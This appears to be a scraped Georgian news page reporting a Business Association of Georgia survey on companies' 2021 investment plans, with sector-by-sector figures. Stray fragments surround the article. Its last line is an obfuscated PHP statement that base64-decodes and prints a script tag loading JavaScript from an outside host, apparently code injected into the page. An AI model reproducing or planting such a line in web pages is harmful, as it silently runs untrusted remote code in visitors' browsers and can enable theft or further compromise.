celsiusi
ავერსი საქკაბელი
BAG ინდექსის ფარგლებში გამოკითხული კომპანიების 51% აცხადებს, რომ 2021 წელს მათ მიერ განხორციელებული ინვესტიციები 2020 წელთან შედარებით გაიზრდება,- ამის შესახებ „ბიზნესთაიმს“ ბიზნეს ასოციაციიდან აცნობეს.
 
მათივე ინფორმაციით, განხორციელებული ინვესტიციების კლებას გამოკითხულთა მხოლოდ 11% პროგნოზირებს. რაც მიუთითებს, რომ საინვესტიციო აქტივობა მიმდინარე წელს სავარაუდოდ გაიზრდება. თუმცა ჯერ საგრძნობლად ჩამორჩება იმ ტემპს, რომელიც პანდემიამდე არსებობდა.
 
როგორც კვლევაშია ნათქვამი, 2020 წელს, პანდემიის თანამდევი სირთულეების გავლენა იგრძნობოდა ყველა სექტორში (კვლევის მიზნებისთვის კომპანიები იყოფა ოთხ სექტორად: ვაჭრობა, მომსახურება, მრეწველობა, მშენებლობა). ვაჭრობის სექტორში გამოკითხულთა 44%-მა განაცხადა, რომ 2019 წელთან შედარებით, 2020 წელს ინვესტიციები შეამცირა. აღნიშნული მაჩვენებელი მშენებლობის, მომსახურებისა და მრეწველობის სექტორებში შესაბამისად 36%-ს, 34%-სა და 6%-ს შეადგენდა.
 
„მიმდინარე წელს ინვესტიციების კლების ტენდენცია შემსუბუქდება. ვაჭრობის სექტორში გამოკითხულთა ნახევარზე მეტი გეგმავს ინვესტიციების ზრდას. მსგავსი მდგომარეობაა მრეწველობისა და მომსახურების სექტორებშიც. ხოლო სექტორებს შორის ყველაზე პესიმისტური მოლოდინი 2021 წელთან დაკავშირებით მშენებლობის სექტორში დაფიქსირდა.
 
აღსანიშნავია, რომ კვლევა 2021 წლის პირველი კვარტლის შუა პერიოდში ჩატარდა, როდესაც ეკონომიკური შეზღუდვების შემსუბუქების ფონზე ბიზნესის მოლოდინი განსაკუთრებით პოზიტიური იყო. შეზღუდვების ხელახალი გამკაცრების პირობებში, ამჟამად არსებული გეგმების ცვლილებას უნდა ველოდოთ. მაგალითისთვის, 2019 წლის ბოლოს ჩატარებული გამოკითხვის თანახმად, რესპონდენტთა 59% გეგმავდა ინვესტიციების გაზრდას 2020 წელს. თუმცა, პანდემიის პირობებში, 2020 წელს, ინვესტიციები გამოკითხულთა მხოლოდ 35%-მა გაზარდა.
 
ინვესტიციების კვლევა BAG ინდექსის ფარგლებში წელიწადში ორჯერ ტარდება და საქართველოს ბიზნეს ასოციაციის წევრებისა და მათ ჯგუფში შემავალი კომპანიების გეგმებს აჯამებს”,- ნათქვამია ინფორმაციაში.
1155
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");